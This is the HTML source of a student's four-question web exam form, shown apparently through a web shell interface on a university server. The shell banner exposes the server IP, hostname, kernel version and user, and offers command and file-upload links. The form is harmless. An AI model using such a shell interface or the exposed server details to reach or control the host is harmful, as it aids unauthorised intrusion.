Server IP : 172.16.15.8 / Your IP : 3.142.53.151 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/assterling/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- WebExam.html Adam Sterling 2/11/24 Goal: 4 questions with 4 multiple choice options ; next page should show score and what questions were wrong --> <CENTER> <H2> Web Exam Form </H2> <HR> <FORM action=WebExamAct.php method=post> 1. How many days are there in 2024? <INPUT type=radio name=q1 value=1 checked> 366 <INPUT type=radio name=q1 value=2> 2 <INPUT type=radio name=q1 value=3> 21 <INPUT type=radio name=q1 value=4> 300 <P> 2. What is the best major? <INPUT type=radio name=q2 value=1 checked> Mathematics <INPUT type=radio name=q2 value=2> Computer Science <INPUT type=radio name=q2 value=3> Chemistry <INPUT type=radio name=q2 value=4> Biology <P> 3. Who is the instructor of CS 389? <INPUT type=radio name=q3 value=1 checked> A A <INPUT type=radio name=q3 value=2> B B <INPUT type=radio name=q3 value=3> Z W <INPUT type=radio name=q3 value=4> Z Z <P> 4. What is i*i? <INPUT type=radio name=q4 value=1 checked> -i <INPUT type=radio name=q4 value=2> i <INPUT type=radio name=q4 value=3> 1 <INPUT type=radio name=q4 value=4> -1 <HR> <INPUT type=submit value="Submit Form"> <INPUT type=reset value="Reset Form"> </FORM> </CENTER>